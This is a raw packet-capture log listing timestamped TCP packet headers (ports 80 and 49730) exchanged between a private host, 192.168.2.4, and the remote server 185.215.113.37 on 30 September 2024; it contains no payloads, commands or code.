Sep 30, 2024 07:08:10.116800070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116815090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116828918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116832018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116841078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116844893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116862059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116873980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116878986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116899014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116914034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116926908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116934061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116955996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116956949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.116971016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.116988897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117005110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117016077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117050886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117065907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117080927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117094040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117099047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117108107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117122889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117141008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117223024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117238045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117252111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117265940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117275953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117276907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117291927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117301941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117306948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117316961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117321968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117336035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117338896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117343903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117363930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117367983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117378950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117378950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117396116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117410898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117413044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117443085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117450953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117450953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117450953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117459059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117475033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117486954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117491007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117501974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117521048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117533922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117579937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117594957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117609024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117620945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117640972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117655993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117661953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117677927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117691994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117706060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117718935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117738008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117880106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117896080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117911100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117924929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117925882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117939949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117944002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117960930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117960930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117975950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117981911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.117991924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.117995977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118007898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118022919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118022919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118037939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118041992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118052959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118067026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118067980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118098974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118124962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118216991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118232012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118247032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118261099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118263006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118277073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118283033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118294001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118309021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118316889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118324995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118340015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118345022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118354082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118359089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118370056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118383884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118386030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118400097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118412971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118431091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118458033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118532896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118549109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118562937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118577003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118581057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118592978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118602037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118609905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118627071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118665934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118690014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118705034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118717909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118731022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118732929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118741989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118762016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118774891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118784904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118789911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118804932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118814945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118819952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118834972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118841887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118843079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118865013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118885994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118901968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.118920088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.118952036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119131088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119153023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119167089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119174004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119182110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119194984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119198084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119213104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119218111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119227886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119230032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119244099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119254112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119266033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119277000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119282007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119297028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119304895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119312048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119327068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119339943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.119379044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.119406939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203260899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203278065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203286886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203310013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203324080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203337908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203341961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203352928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203381062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203403950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203479052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203495979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203510046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203525066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203531981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203537941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203540087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203567028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203572989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203586102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203588963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203604937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203614950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203629017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203639030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203649044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203660965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203680038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203704119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203748941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203763008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203777075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203792095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203792095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203804016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203807116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203823090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203824043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203835964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203841925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203851938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203862906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203877926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203887939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203893900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203903913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203918934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203933954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203949928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203983068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.203989029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.203999996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204014063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204027891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204046965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204087019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204102039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204116106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204118013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204125881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204130888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204144955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204159021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204181910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204191923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204226971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204246998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204261065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204272985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204276085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204292059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204293013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204307079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204325914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204336882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204389095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204404116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204417944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204427958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204432011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204447985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204447985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204462051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204464912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204483986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204493046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204513073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204535961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204550982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204565048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204577923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204579115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204592943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204593897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204610109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204619884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204622984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204638958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204643011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204654932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204657078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204670906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204677105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204688072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204703093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204703093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204719067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204737902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204752922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204838991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204854965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204869032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204883099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204885006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204898119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204900980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204912901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204916000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204930067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.204942942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204982996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204989910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.204997063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205010891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205024958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205039024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205044031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205051899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205054998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205070019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205071926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205085039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205094099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205105066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205110073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205123901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205123901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205133915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205140114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205156088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205167055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205178976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205188036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205194950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205221891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205240965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205250978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205265999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205280066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205291033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205296040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205311060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205324888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205326080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205346107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205359936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205372095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205374956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205388069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205410957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205416918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205425978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205427885 CEST	80	49730	185.215.113.37	192.168.2.4
